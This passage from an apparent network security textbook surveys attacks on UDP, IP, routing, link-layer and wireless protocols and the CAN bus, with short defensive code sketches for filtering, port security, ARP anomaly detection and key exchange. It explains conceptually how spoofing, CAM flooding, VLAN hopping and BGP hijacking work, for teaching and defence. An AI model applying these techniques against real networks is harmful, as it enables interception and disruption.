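# On ACK:  recompute the cookie and accept the connection only if the
#          acknowledgment number minus one matches for the current or the
#          previous time slice t.
```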
What TLS is for TCP, Datagram TLS (DTLS) is for UDP. Yet again there are additional security
considerations for UDP that we briefly discuss next. In contrast to its big brother TCP, UDP is
designed such that application-layer protocols have to handle key mechanisms themselves
(or tolerate their absence), including reordering, reliable transport, or identifier recognition.
Furthermore, being a connection-less protocol, UDP endpoints do not implicitly verify each
other’s IP addresses before communication starts. Consequently, if not handled at the appli-
cation layer, UDP protocols are prone to IP spoofing attacks. We already showcased the
consequences of this with the example of DNS spoofing. In general, to protect against this threat,
any UDP-based application protocol must gauge the security impact of IP spoofing.
Reflective DDoS attacks are a particular subclass of IP spoofing attacks. Here, attackers send
IP packets in which the source IP address corresponds to a DDoS target. If the immediate
recipients (called reflectors) reply to such packets, their answers overload the victim with
undesired replies. We mentioned this threat already in the context of DNS (Section 19.3.1.3).
The general vulnerability boils down to the lack of IP address validation in UDP. Consequently,
several other UDP-based protocols are similarly vulnerable to reflection [1744]. Reflection
attacks turn into amplification attacks, if the responses are significantly larger than the
requests, which effectively amplifies the attack bandwidth. Unless application-level protocols
validate addresses, or enforce authentication, reflection for UDP-based protocols will remain
possible. If protocol changes would break compatibility, implementations are advised to
rate-limit the frequency with which clients can trigger high-amplification responses. Alternatively,
non-mandatory instances of amplifying services can be taken offline [1745].
19.3.2.5 QUIC
QUIC is a new transport-level protocol that saw rapid deployment by popular Web browsers.
QUIC offers faster communication by carrying traffic such as HTTP over UDP instead of TCP.
QUIC was originally designed by Google, and was then standardized by the IETF in 2021 [1760].
Its main goal is increasing communication performance using multiplexed connections. Being
a relatively new protocol, QUIC, in contrast to older protocols, was designed to be secure.
Technically, QUIC uses most of the concepts described in TLS 1.3, but replaces the TLS Record
Layer with its own format. This way, QUIC can encrypt not only the payload, but also most of the header data.
QUIC, being UDP-based, “replaces” the TCP three-way handshake by its own handshake, which
integrates the TLS handshake. This eliminates any round-trip time overhead of TLS. With
reference to Figure 19.2, QUIC integrates the two TLS 1.3 handshake messages
into its own handshake. When serving certificates and additional data during the handshake,
QUIC servers run the risk of being abused for amplification attacks (cf. Section 19.3.2.4), as
server responses are significantly larger than initial client requests. To mitigate this problem,
QUIC servers verify addresses during the handshake, and must not exceed a certain amplification
factor prior to verifying addresses (the IETF standard defines a factor of three).
IP Spoofing: IP spoofing, as discussed for UDP and DNS (sections 19.3.2.4 and 19.3.1.3,
respectively), finds its root in the Internet Protocol (IP) and affects both IPv4 and IPv6. In
principle, malicious clients can freely choose to send traffic with any arbitrary IP address.
Thankfully, most providers perform egress filtering and discard traffic from IP addresses
outside of their domain [1761]. Furthermore, Unicast Reverse Path Forwarding (uRPF) enables
on-path routers to drop traffic from IP addresses that they would have expected entering on
other interfaces [1761].
Fragmentation Attacks: IPv4 has to fragment packets that do not fit the network’s Maximum
Transmission Unit (MTU). While fragmentation is trivial, defragmentation is not, and has
led to severe security problems in the past. For example, a Teardrop attack abuses the fact
that operating systems may try to retain huge amounts of payload when trying to reassemble
highly-overlapping fragments of a synthetic TCP segment. Fragmentation also eases DNS
cache poisoning attacks in that attackers need to bruteforce a reduced search space by
attacking only the non-starting fragments [1762]. Finally, fragmentation may assist attackers
in evading simple payload matches by scattering payload over multiple fragments.
VPNs and IPsec: Many organisations prefer their traffic to be fully encrypted as it leaves
their network. For example, they may want to connect several islands of private networks
owned by an organisation via the Internet. Also, employers and employees want a flexible work
environment where people can work from home, or connect from a hotel room or an airport
lounge without compromising their security. If only individual, otherwise-internal web hosts
need to be made available, administrators can deploy web proxies that tunnel traffic (sometimes
referred to as WebVPN). In contrast, a full-fledged Virtual Private Network (VPN) connects
two or more otherwise-separated networks, and not just individual hosts.
There are plenty of security protocols that enable VPNs, such as Point-to-Point Tunneling
Protocol (PPTP) (deprecated), TLS (used by, e.g., OpenVPN [1763]), or Secure Socket Tunneling
Protocol (SSTP). We will illustrate the general VPN concept at the example of the Internet
Protocol Security (IPsec) protocol suite. Figure 19.4 shows an employee working from home
accessing a server at work: the VPN client on their host encapsulates IPv4 datagrams into
IPsec and encrypts the IPv4 payload containing TCP or UDP segments, or other control messages.
The corporate gateway detects the IPsec datagram, decrypts it and decapsulates it back
to the IPv4 datagram before forwarding it to the server. Every response from the server is
also encrypted by the gateway. IPsec also provides data integrity, origin authentication and
replay attack prevention. These guarantees depend on the chosen IPsec protocol, though.
Only the recommended and widely-deployed Encapsulating Security Payload (ESP) protocol
(part of IPsec) provides these guarantees, including confidentiality and origin authentication.
In contrast, the less popular Authentication Header (AH) protocol provides integrity only.
Similarly, several tunneling protocols such as Generic Routing Encapsulation (GRE), Layer
2 Tunneling Protocol (L2TP) or Multiprotocol Label Switching (MPLS) do not provide CIA
guarantees. Should those guarantees be required in untrusted networks, e.g., when using GRE’s
multi-protocol or multi-casting functionality, it is advisable to combine these protocols with IPsec.
The entire set of modes/configurations/standards provided by IPsec is extensive [1764].
Here, we only briefly note that IPsec supports two modes of operation: tunnel mode
and transport mode, as compared in Figure 19.3. In transport mode, only the IP payload—not
the original IP header—is protected. The tunnel mode represents a viable alternative if the
edge devices (routers/gateways) of two networks are IPsec aware. Then, the rest of the
servers/hosts need not worry about IPsec. The edge devices encapsulate every IP packet
in IPsec, including the header. This virtually creates a secure tunnel between the two edge
devices.
Figure 19.3: Comparison between IPsec transport mode (IP header | IPsec hdr | IP data, with
the IP data protected) and tunnel mode (new IP hdr | IPsec hdr | IP header | IP payload, with
the entire original packet protected).
Figure 19.4: IPsec client-server interaction in transport mode (no protection of IP headers): an
IPsec-compliant host in a home network communicates across the public Internet with a
gateway router in an enterprise network; the TCP/UDP payload is encrypted.
The receiving edge device then decapsulates the IPv4 datagram and forwards it within its network
using standard IP forwarding. Tunnel mode simplifies key negotiation, as two edge devices
can handle connections on behalf of all hosts in their respective networks. An additional
advantage is that the IP headers (including source/destination addresses) also get encrypted.
When a large number of endpoints use IPsec, manually distributing the IPsec keys becomes
challenging. RFC 7296 [1765] defines the Internet Key Exchange protocol (IKEv2). Readers
will observe a similarity between TLS (Section 19.3.2) and IKE, in that IKE also requires an
initial handshake process to negotiate cryptographic algorithms and other values such as
nonces, and to exchange identities and certificates. We will skip the details of a complex two-
phase protocol exchange which results in the establishment of a quantity called SKEYSEED.
These SKEYSEEDs are used to generate the keys used during a session (Security Associa-
tions (SAs)). IKEv2 uses the Internet Security Association and Key Management Protocol
(ISAKMP) [1766], which defines the procedures for authenticating the communicating peer,
creation and management of SAs, and the key generation techniques.
NAT: Due to the shortage of IPv4 address space, Network Address Translation (NAT) was
designed so that private IP addresses could be mapped onto an externally routable IP address
by the NAT device [1731]. For an outgoing IP packet, the NAT device changes the private source
IP address to a public IP address of the outgoing link. This has implicit, yet unintentional
security benefits. First, NAT obfuscates the internal IP address from the outside world. To a
potential attacker, the packets appear to be coming from the NAT device, not the real host
behind the NAT device. Second, unless loopholes are opened via port forwarding or via UPnP,
NAT gateways such as home routers prevent attackers from reaching internal hosts.
Although conceptually very similar from a security perspective, IPv6 brings a few advantages
over IPv4. For example, IPv6’s 128-bit address space slows down port scans, as opposed
to IPv4, where the entire 32-bit address space can be scanned in less than an hour [1767].
Similarly, IPv6 comes with built-in encryption in the form of IPsec, which was initially mandated
in the early IPv6 standard. Nowadays, however, due to implementation difficulties, IPsec remains a
recommendation only. Furthermore, in contrast to IPv4, IPv6 has no options in its header—
these were used for attacks/exploits in IPv4.
The community has debated many years over the potential security pitfalls with IPv6. As a
quite drastic change, the huge address space in IPv6 obsoletes NATing within the IPv6 world,
including all its implicit security benefits. In particular, NAT requires state tracking, which
devices often couple with a stateful firewall (which we will discuss in Section 19.4.1) that brings
additional security. Furthermore, NAT hides the true IP addresses and therefore complicates IP-
based tracking—providing some weak form of anonymity. Having said this, experts argue that
these perceived advantages also come with lots of complexity and disadvantages (e.g., single
point of failure), and that eliminating NAT by no means implies that Internet-connected devices
no longer have firewalls [1768]. Furthermore, having large networks to choose addresses from,
IPv6 may allow IP addresses to be rotated more frequently to complicate address-based tracking.
Summarizing this debate, as long as we do not drop firewalls, and are careful with IP address
assignment policies, IPv6 does not weaken security.
Finally, another important aspect to consider is that we are still in a steady transition from IPv4
to IPv6. Hence, many devices feature a so-called dual stack, i.e., IPv4 and IPv6 connectivity.
This naturally requires protecting both network accesses simultaneously.
IPv4/IPv6 assume that Internet routers reliably forward packets from source to destination.
Unfortunately, a network can easily be disrupted if either the routers themselves are compro-
mised or they accept spurious routing exchange messages from malicious actors. We will
discuss these threats in the following, distinguishing between internal and external routing.
Within an Autonomous System (AS): Interior Gateway Protocols (IGPs) are used for exchang-
ing routing information within an Autonomous System (AS). Two such protocols, Routing
Information Protocol (RIPv2) and Open Shortest Path First (OSPFv2), are in widespread use
within ASs for IPv4 networks. The newer RIPng and OSPFv3 versions support IPv6. These
protocols support no security by default but can be configured to support either plain text-
based authentication or MD5-based authentication. Authentication can avoid several kinds
of attacks such as bogus route insertion or modifying and adding a rogue neighbour. Older
routing protocols, including RIPv1 or Cisco’s proprietary Interior Gateway Routing Protocol
(IGRP)—unlike its more secure successor, the Enhanced Interior Gateway Routing Protocol
(EIGRP)—do not offer any kind of authentication, and hence, should be used with care.
Across ASs: The Internet uses a hierarchical system where each AS exchanges routing infor-
mation with other ASs using the Border Gateway Protocol (BGP) [1769, 1770]. BGP is a path
vector routing protocol. We distinguish between External BGP used across ASs, and Internal
BGP that is used to propagate routes within an AS. From now on, when referring to BGP, we
talk about External BGP, as it comes with the most interesting security challenges. In BGP, ASs
advertise their IP prefixes (IP address ranges of size /24 or larger) to peers, upstreams and
customers [1731]. BGP routers append their AS information before forwarding these prefixes
to their neighbors. Effectively, this creates a list of ASs that have to be traversed to reach the
prefix, commonly referred to as the AS path.
High-impact attacks in the past have highlighted the security weaknesses in BGP due to its
lack of integrity and authentication [1771]. In particular, in a BGP prefix hijacking attack [1772],
a malicious router could advertise an IP prefix, saying that the best route to a service is
through its network. Once the traffic starts to flow through its network, it can drop (DoS,
censorship), sniff on (eavesdrop) or redirect traffic in order to overload an unsuspecting AS.
As a countermeasure, the Resource Public Key Infrastructure (RPKI) [1773], as operated by
the five Regional Internet Registries (RIRs), maps IP prefixes to ASs in so-called Route Origin
Authorizations (ROAs). When neighbors receive announcements, RPKI allows them to discard
BGP announcements that are not backed by an ROA or are more specific than allowed by the
ROA. This process, called Route Origin Validation (ROV), enables routers to drop advertisements
in which the AS that owns the advertised prefix is not on the advertised path.
RPKI cannot detect bogus advertisements where the owning AS is on path, but a malicious
AS aims to reroute the target’s AS traffic as an intermediary. BGPsec partially addresses this
remaining security concern [1774]. Two neighbouring routers can use IPsec mechanisms for
point-to-point security to exchange updates. Furthermore, BGPsec enables routers to verify
the incremental updates of an announced AS path. That is, they can verify which on-path
AS has added itself to the AS path, preventing bogus paths that include a malicious AS that
lacks the corresponding cryptographic keys. However, BGPsec entails large overheads, such as verifying a large number of signatures at boot time and splitting up bulk announcements into many smaller ones. Furthermore, BGPsec only adds security if all systems on the AS path support it. Hence, few routers deploy BGPsec yet—a reluctance fuelled by the lack of short-term benefits [1775]—and it is likely to take years until it finds wide adoption, if ever.
Despite the fact that BGP prefix hijacks are a decades-old problem, fixing them retroactively remains one of the great unsolved challenges in network security. In fact, one camp argues that the BGP design is inherently flawed [1776], and entire (yet not widely deployed) Internet redesigns such as SCION [1777] indeed provide much stronger guarantees. Others have not given up yet, and hope to further strengthen the trust in AS paths with the help of ongoing initiatives such as Autonomous System Provider Authorization (ASPA) [1778].
The Internet Control Message Protocol (ICMP) is a supporting protocol mainly used for exchanging status or error information. Unfortunately, it has introduced several orthogonal security risks, most of which are no longer present but are still worth mentioning. Most notably, there are many documented cases in which ICMP was an enabler for Denial of Service (DoS) attacks. The Ping
of Death abused a malformed ICMP packet that triggered a software bug in earlier versions
of the Windows operating system, typically leading to a system crash at the packet recipient.
In an ICMP flood, an attacker sends massive amounts of ICMP packets to swamp a target
network/system. Such floods can be further amplified in so-called smurf attacks, in which an
attacker sends IP-spoofed ICMP ping messages to the broadcast address of an IP network.
If the ICMP messages are relayed to all network participants using the (spoofed) address
of the target system as source, the target receives ping responses from all active devices.
Smurf attacks can be mitigated by dropping ICMP packets from outside of the network, or by
dropping ICMP messages destined to broadcast addresses.
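As a minimal illustration of the second mitigation, a border device could apply a predicate like the following sketch (the local subnet is hypothetical); production deployments would express this as a router or firewall rule instead:

    import ipaddress

    LOCAL_SUBNETS = [ipaddress.ip_network("192.0.2.0/24")]   # hypothetical

    def drop_smurf(dst_ip: str, is_icmp: bool) -> bool:
        """True if the packet is ICMP aimed at one of our broadcast addresses."""
        dst = ipaddress.ip_address(dst_ip)
        return is_icmp and any(dst == n.broadcast_address for n in LOCAL_SUBNETS)

    assert drop_smurf("192.0.2.255", True)       # ping to broadcast: drop
    assert not drop_smurf("192.0.2.7", True)     # unicast ping: pass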
ICMP is also worth considering from a security perspective outside of the DoS context. Insider attackers can abuse ICMP as a covert channel to leak sensitive data unless ICMP is closely monitored or forbidden. ICMP reachability tests allow attackers to perform network reconnaissance during network scans (see also Section 19.4.3). Many network operators thus balance the pros and cons of ICMP in their networks, often deciding to drop external ICMP messages using a firewall (see also Section 19.4.1).
IEEE 802.1X is a port-based authentication standard for securing both wired and wireless networks. Before users can access a network at the link layer, they must authenticate to the switch or Access Point (AP) they are attempting to connect to, whether physically wired or via a wireless channel. As with most standards bodies, this group has its own jargon. Figure 19.5 shows a typical 802.1X setup. A user is called a supplicant and a switch or AP is called an authenticator. Supplicant software is typically available on various OS platforms, or it can also be provided by chipset vendors.
A supplicant (client) wishing to access a network must use the Extensible Authentication
Protocol (EAP) to connect to the Authentication Server (AuthS) via an authenticator. The EAP
is an end-to-end (client to authentication server) protocol. When a new client (supplicant) is connected to an authenticator, the port on the authenticator is set to the ‘unauthorised’ state, allowing only 802.1X traffic. Other higher-layer traffic, such as TCP or UDP, is blocked. The authenticator sends an EAP-Request identity to the supplicant. The supplicant answers with an EAP-Response packet, which is forwarded to the AuthS and typically proves that the supplicant possesses its credentials. After successful verification, the authenticator unblocks the port to let higher-layer traffic through. When the supplicant logs off, an EAP-Logoff message to the authenticator sets the port back to blocking all non-EAP traffic.
[Figure 19.5: A typical IEEE 802.1X setup: wired and wireless supplicants connect via an authenticator (hub/AP) on the LAN, speaking EAP towards the authentication server, e.g., using EAP-TLS.]
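To make the port-based control concrete, the following is a minimal sketch of the authenticator behaviour described above; the names (Port, handle_frame) are illustrative and not taken from the standard:

    class Port:
        """Sketch of an authenticator-controlled port (illustrative names)."""
        def __init__(self):
            self.state = "unauthorised"          # initially only 802.1X traffic

        def handle_frame(self, kind, auth_ok=None):
            if kind == "eap":                    # relayed to/from the AuthS
                if auth_ok:                      # AuthS verified the credentials
                    self.state = "authorised"    # unblock higher-layer traffic
                return "forward"
            if kind == "eap-logoff":
                self.state = "unauthorised"      # back to blocking non-EAP
                return "forward"
            # TCP/UDP and other higher-layer traffic:
            return "forward" if self.state == "authorised" else "drop"

    port = Port()
    assert port.handle_frame("tcp") == "drop"        # blocked before auth
    port.handle_frame("eap", auth_ok=True)           # EAP success reported
    assert port.handle_frame("tcp") == "forward"     # port now unblocked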
There are a couple of pitfalls when deploying EAP, most of them rooted in choosing the wrong mode of operation. Certain EAP modes are prone to PITM attacks, especially in a wireless setting. It is therefore advised to use a TLS-based EAP variant, such as EAP-TLS [1779] or the Protected Extensible Authentication Protocol (PEAP). Similarly, dictionary attacks can weaken the security guarantees of certain EAP modes (e.g., EAP-MD5), which should therefore be avoided.
What IEEE 802.1X is for local networks, protocols like Point-to-Point Protocol (PPP), its sibling
PPP over Ethernet (PPPoE), or High-Level Data Link Control (HDLC) are for Wide Area Networks
(WANs). They offer clients the means to connect to the Internet with the help of their ISPs. PPP(oE) is the most widely used protocol in this context, used by billions of broadband devices worldwide. Although optional in its standard, in practice ISPs usually mandate client authentication to keep unauthorised users out. Popular examples of such authentication protocols within PPP are the Password Authentication Protocol (PAP), the Challenge Handshake Authentication Protocol (CHAP), or any of the authentication protocols supported by EAP. Usage of PAP is discouraged, as it transmits client credentials in plaintext. Instead, CHAP uses a reasonably secure challenge-response authentication, which is, however, susceptible to offline brute-force attacks against recorded authentication sessions if the credentials are weak.
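CHAP's challenge-response (RFC 1994) is easily sketched: the response is MD5 over the message identifier, the shared secret and the challenge, so the secret itself never crosses the wire—but an eavesdropper who records the exchange can test candidate passwords offline:

    import hashlib, os

    def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
        # RFC 1994: Response = MD5(Identifier || secret || Challenge)
        return hashlib.md5(bytes([identifier]) + secret + challenge).digest()

    challenge = os.urandom(16)                       # sent by the authenticator
    resp = chap_response(1, b"correct-horse", challenge)
    # The authenticator recomputes the hash with its stored secret:
    assert resp == chap_response(1, b"correct-horse", challenge)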
Ethernet switches maintain forwarding table entries in a Content Addressable Memory (CAM).
As a switch learns about a new destination host, the switch includes this host’s address and
its physical port in the CAM. For all future communications, this table entry is looked up to
forward a frame to the correct physical port. MAC spoofing allows attackers to manipulate this mapping by forging their Media Access Control (MAC) addresses when sending traffic. For example, to poison the forwarding table, an attacker crafts frames with random source addresses
to populate an entire CAM. If successful, switches have to flood all the incoming data frames
to all the outgoing ports, as they can no longer enter new address-to-port mappings. This
makes the data available to the attacker attached to any of the switch ports.
Such MAC spoofing attacks can also be more targeted. Assume attackers want to steal traffic
destined to one particular target host only, instead of seeing all traffic. The attacker then
copies the target’s MAC address. This way, the attacker may implicitly rewrite the target’s entry
in the switch forwarding table. If so, the switch will falsely forward frames to the attacking
host that were actually destined for the target host.
Mitigating these MAC spoofing attacks requires authenticating the MAC addresses before
populating the forwarding table entry. For example, IEEE 802.1X (see Section 19.3.4.1) mitigates such attacks by vetting hosts before they can connect. Furthermore, switches may limit the number of MAC addresses per interface or enforce MAC bindings, as described next.
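A minimal sketch of such a per-interface limit ('port security'), with illustrative names and limit rather than any vendor's API, which refuses both CAM flooding and targeted MAC copying:

    MAX_MACS = 2       # illustrative per-port limit
    cam = {}           # mac -> port

    def learn(port: int, mac: str) -> bool:
        """Admit a (port, mac) binding, or refuse and signal an alert."""
        if mac in cam and cam[mac] != port:
            return False   # address moved ports: possible MAC copying
        if mac not in cam and sum(1 for p in cam.values() if p == port) >= MAX_MACS:
            return False   # per-port limit hit: possible CAM flooding
        cam[mac] = port
        return True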
The Address Resolution Protocol (ARP) translates IPv4 addresses to link layer addresses
(e.g., MAC addresses in Ethernet). ARP spoofing is similar to MAC spoofing, yet does not (only) target the switch's address mappings. Instead, ARP spoofing targets the IP-to-MAC address mappings of all network participants (possibly including the switch) in the same segment. To this end, ARP spoofing attackers send fake ARP messages over a LAN. For example, they can broadcast crafted ARP requests and hope participants learn wrong IP-to-MAC mappings on the fly, or reply with forged replies to ARP requests. Either way, attackers
aim to (re-)bind the target’s IP address to their own MAC address. If successful, attackers
will receive data that were intended for the target’s IP address. ARP spoofing is particularly
popular for session hijacking and PITM attacks. Similar attacks are possible for the Reverse
Address Resolution Protocol (RARP), which—by now rarely used—allows hosts to discover
their IP address. To mitigate ARP spoofing, switches employ (or learn) a trusted database of
static IP-to-MAC address mappings, and refuse to relay any ARP traffic that contradicts these
trusted entries. Alternatively, network administrators can spot ARP anomalies [1780], e.g.,
searching for suspicious cases in which one IP address maps to multiple MAC addresses.
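That anomaly check can be sketched in a few lines: flag any IP address claimed by more than one MAC in the observed ARP replies (the addresses below are illustrative):

    from collections import defaultdict

    seen = defaultdict(set)     # ip -> set of MACs claiming it

    def observe_arp_reply(ip: str, mac: str):
        seen[ip].add(mac)
        if len(seen[ip]) > 1:   # one IP, several MACs: likely spoofing
            print(f"ARP anomaly: {ip} claimed by {sorted(seen[ip])}")

    observe_arp_reply("192.0.2.1", "aa:aa:aa:aa:aa:aa")
    observe_arp_reply("192.0.2.1", "bb:bb:bb:bb:bb:bb")   # raises an alert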
What ARP is for IPv4, the Neighbor Discovery Protocol (NDP) is for IPv6. NDP is based on
ICMPv6 and is more feature-rich than ARP. Conceptually, NDP is subject to the same spoofing risks as ARP, though, and requires the same countermeasures. Furthermore, there is one more caveat due to automatic IPv6 address assignment. In IPv6's most basic (yet common) IP address autoconfiguration scheme, layer-3 addresses are derived directly from layer-2 addresses without any need for address resolution. Knowledge of the MAC address may allow attackers to infer information about a host/server, which can be handy when launching attacks, or to track devices even if they change network prefixes. Using a hash function for address generation is recommended as a mitigation technique. Further, RFC 4982 extends
IPv6 by allowing for a Cryptographically Generated Address (CGA) where an address is bound
to a public signature key. Orthogonal to this, RFC 7217 proposes to have stable addresses
within a network prefix, and change them when clients switch networks to avoid cross-network
tracking.
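In the spirit of RFC 7217, a stable-but-opaque interface identifier can be derived from the prefix plus a host-local secret rather than from the MAC address; the inputs below are simplified relative to the RFC (which also mixes in a network ID and a duplicate-address counter):

    import hashlib

    def stable_iid(prefix: str, if_name: str, secret: bytes) -> bytes:
        """Derive a 64-bit interface identifier from prefix + local secret."""
        h = hashlib.sha256(prefix.encode() + if_name.encode() + secret)
        return h.digest()[:8]   # same network -> stable; new prefix -> new IID

    print(stable_iid("2001:db8:1::/64", "eth0", b"host-secret").hex())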
MAC spoofing and ARP spoofing nicely illustrate how fragile security at the link layer is. Consequently, network architects aim to split their physical network into several smaller networks—a practice known as network segmentation. Highly critical environments such as sensitive military or control networks use physical segmentation. As the required change of cables and wires is quite expensive, virtual network segmentation has become a popular alternative. Virtual LANs (VLANs) are the de facto standard for virtual segmentation on Ethernet networks. VLANs can split sensitive (e.g., internal servers) from less sensitive (e.g., guest WiFi) network segments. VLANs ensure that traffic between segments must pass through routers, which can see and react upon it, and they limit the harm attackers can do to the entire LAN. It is important to note that
network segmentation (e.g., via VLANs) does not necessarily require VPNs to bridge the
networks. If all network segments are local, a router that is part of multiple subnetworks can
connect them, ideally augmented with secure firewall policies (cf. Section 19.4.1) that control
inter-network communication at the IP layer.
VLAN hopping attacks allow an attacking host on a VLAN to gain access to resources on
other VLANs that would normally be restricted. There are two primary methods of VLAN
hopping: switch spoofing and double tagging. In a switch spoofing attack, an attacking host
impersonates a trunking switch responding to the tagging and trunking protocols (e.g., IEEE
802.1Q or Dynamic Trunking Protocol) typically used in a VLAN environment. The attacker
now succeeds in accessing traffic for multiple VLANs. Vendors mitigate these attacks through proper switch configuration: trunk ports are assigned their role explicitly, while all other ports are configured as access ports only. Also, any automatic trunk negotiation protocol
can be disabled. In a double tagging attack, an attacker succeeds in sending frames to more than one VLAN by inserting two VLAN tags into a transmitted frame. However, this attack does
not allow them to receive a response. Again, vendors provide recommended configuration
methods to deal with these possible attacks. A comprehensive survey of Ethernet attacks
and defence can be found in [1781].
Organisations like hosting providers that heavily virtualise services quickly reach the limit of slightly fewer than 4096 VLANs when trying to isolate their services.
Virtual eXtensible LAN (VXLAN) tackles this limitation by introducing an encapsulation scheme
for multi-tenant environments [1782]. Unlike VLANs, which work on the link layer, VXLANs
strictly speaking operate at the network layer to emulate link-layer networks. VXLAN allows
creating up to ≈16M virtually separated networks, which can additionally be combined with
VLAN functionality. Like VLANs, VXLANs also do not aim to provide confidentiality or integrity
in general. Instead, they are means to segment networks. Worse, however, being on the network
layer, VXLAN packets can traverse the Internet, and may allow attackers to inject spoofed
VXLAN packets into “remote” networks. Thus, care has to be taken, e.g., by ingress filtering at the network edge to drop external VXLAN packets that carry a valid VXLAN endpoint IP address.
Wireless LANs are more vulnerable to security risks due to the broadcast nature of the medium, which simplifies eavesdropping. There have been several failed attempts to add integrity and confidentiality to WLAN communication. First, the Wired Equivalent Privacy (WEP) protocol used a symmetric key encryption method where the host shares a key with an Access Point (AP) out of band. WEP had several design flaws. First, its 24-bit IV introduced a weakness in that the ≈16 million unique IVs can be exhausted on high-speed links in less than 2 hours. Given that IVs
are sent in plaintext, an eavesdropper can easily detect this reuse and mount a known plaintext
attack. Furthermore, using RC4 allowed for the Fluhrer, Mantin and Shamir (FMS) attacks,
in which an attacker can recover the key in an RC4 encrypted stream by capturing a large
number of messages in that stream [1783, 1784]. Furthermore, WEP’s linear CRC was great for
detecting random link errors, but failed to reliably reveal malicious message modifications.
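A back-of-the-envelope check of the IV exhaustion claim (the link speed and frame size below are assumptions; actual figures depend on the traffic pattern):

    ivs = 2 ** 24                  # ~16.7M unique 24-bit IVs
    frame_bits = 1500 * 8          # 1500-byte frames
    rate_bps = 54e6                # a busy 54 Mbit/s link
    frames_per_s = rate_bps / frame_bits             # 4500 frames/s
    print(f"{ivs / frames_per_s / 3600:.1f} hours")  # ≈1 hour until IV reuse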
An interim standard called Wi-Fi Protected Access (WPA) was quickly developed for backwards hardware compatibility while WPA2 was being worked out. WPA uses the Temporal Key Integrity Protocol (TKIP) but maintains RC4 for compatibility. The Pre-Shared Key (PSK), also known as WPA-Personal, is similar to the WEP key. However, the PSK is used differently: a nonce and the PSK are hashed to generate a temporal key. Following this, a cryptographic mixing function is used to combine this temporal key, the transmitter's MAC address, and the sequence counter, resulting in one key for encryption (128 bits) and another key for integrity (64 bits). As a consequence, every packet is encrypted with a unique encryption key to avoid FMS-style attacks. Also, WPA extends the WEP IV to 48 bits. New fields include a Frame Check Sequence (FCS) with a CRC-32 checksum for error detection and a hash function for a proper integrity check. Due to the compromises it made with respect to backwards compatibility, WPA has had its own share of attacks, though [1785].
The Wi-Fi Alliance then standardised WPA2 in 2004. WPA2 relies on more powerful hardware supporting 128-bit AES in Counter Mode with the Cipher Block Chaining Message Authentication Code Protocol (CCMP), obsoleting RC4. It also provides an improved 4-way handshake and temporary key generation method (which does not feature forward secrecy, though). While implementations of this handshake were shown to be insecure [1786], the general handshake methodology was formally verified and is still believed to be secure [1787, 1788].
In 2018, a new WPA3 standard was accepted to make a gradual transition from, and eventually replace, WPA2. WPA3 overcomes the lack of perfect forward secrecy in WPA and WPA2. The PSK is replaced with a new key distribution method called Simultaneous Authentication of Equals (SAE), based on the IETF Dragonfly key exchange. The WPA3-Personal mode uses 128-bit encryption, whereas WPA3-Enterprise uses 192-bit encryption.
The discussion so far assumed that there is a shared secret between WLAN users and APs
from which session keys can be derived. In fact, enterprise settings usually handle WLAN access control using strong authentication such as 802.1X (Section 19.3.4.1). Ideally,
WLAN users have their own client certificates that provide much stronger security than any
reasonably user-friendly password. In contrast, for openly accessible networks such as at
airports or restaurants, there may neither be PSKs nor certificates. Consequently, the lack of
strong encryption would leave communication unprotected. Opportunistic Wireless Encryption
(OWE) tackles this open problem [1789]. Instead of using a PSK during the WPA2/3 four-way
handshake, the client and AP use a pairwise secret derived from an initial Diffie-Hellman Key Exchange (DHKE).
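The core idea can be sketched with an unauthenticated Diffie-Hellman exchange; note that this uses X25519 and HKDF purely for illustration, whereas RFC 8110 specifies particular ECDH groups and its own derivation of the PMK:

    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey
    from cryptography.hazmat.primitives.kdf.hkdf import HKDF

    client, ap = X25519PrivateKey.generate(), X25519PrivateKey.generate()
    # Public keys travel unauthenticated inside the association frames.
    shared = client.exchange(ap.public_key())
    assert shared == ap.exchange(client.public_key())

    pmk = HKDF(algorithm=hashes.SHA256(), length=32, salt=None,
               info=b"owe-sketch").derive(shared)   # feeds the 4-way handshake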
Bus networks follow a special topology in that all nodes are directly connected to a shared
medium (the bus). Securing a bus is inherently complex, especially if we assume that an insider
attacker is connected to the bus. In order to illustrate this, we will focus on the Controller Area
Network (CAN) standard, which despite its age is still quite commonly used in cars today.
CAN nicely reveals many issues that can arise on bus networks in general. CAN connects
so-called Electronic Control Units (ECUs), such as a car's wheel speed sensor, brake pedal or radio.
CAN is a real-time protocol designed to give priority to more urgent ECUs (e.g., brake pedal)
over less pressing ones (e.g., multimedia control). Sadly, CAN suffers from severe security
vulnerabilities. They become especially problematic if ECUs are or turn malicious (e.g., after
compromise). First, CAN does not authenticate messages, i.e., any compromised ECU (e.g.,
multimedia system) can easily spoof messages of critical components (e.g., wheel speed
sensor). Second, compromised bus components can receive and invalidate the messages of arbitrary other ECUs on the same bus. For example, a compromised ECU could suppress
the signals sent by an activated brake pedal. Finally, and a little less concerning than the
previous examples, CAN is unencrypted, providing no confidentiality against sniffing.
A radical protocol change could solve all these problems. In fact, there are new standards
like AUTomotive Open System ARchitecture (AUTOSAR) [1790] that provide improved security
principles. Yet, as always, such radical changes take a long time in practice, as they break compatibility with existing devices. Also, devices have years-long development cycles and usage times. Vendors are aware of these issues and aim to mitigate the problem by segmenting critical
components from less critical ones (segmentation in general is discussed in Section 19.3.4.5).
While certainly a vital step, as it physically disconnects more complex and vulnerable devices
such as multimedia systems from safety-critical devices, this only reduces and does not entirely eliminate the attack surface. A star topology would solve many of these issues, as the
medium is no longer shared and address spoofing could be checked by a central entity. Yet star topologies require significantly more physical cabling, and thus entail higher costs, manufacturing complexity, and weight. Academia has explored several approaches to add message authenticity to CAN and to prevent spoofing on CAN without breaking backwards compatibility [1791, 1792] (see the sketch below). None of them has found wide deployment in practice yet, though, possibly due to costs and the need to adapt ECUs. Alternative approaches aim to detect spoofed messages by learning and modelling the per-ECU voltage of bus messages. Unfortunately, such classifiers were proven unreliable [1793]. A wider adoption of CAN-FD [1738], which offers a flexible data rate and larger messages (64B instead of 8B in CAN), will decrease the overhead of security add-ons and may thus ease the development of more secure CAN communication in the future.
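One such academic direction—appending a truncated MAC plus a replay counter to CAN payloads—can be sketched as follows; the key provisioning and the 4-byte tag length are illustrative assumptions, and the tight 8-byte payload budget shows why CAN-FD helps:

    import hmac, hashlib

    KEY = b"per-ecu-shared-key"    # assumed pre-provisioned; itself a challenge

    def authed_frame(can_id: int, data: bytes, counter: int) -> bytes:
        assert len(data) <= 4      # leave 4 of CAN's 8 payload bytes for the tag
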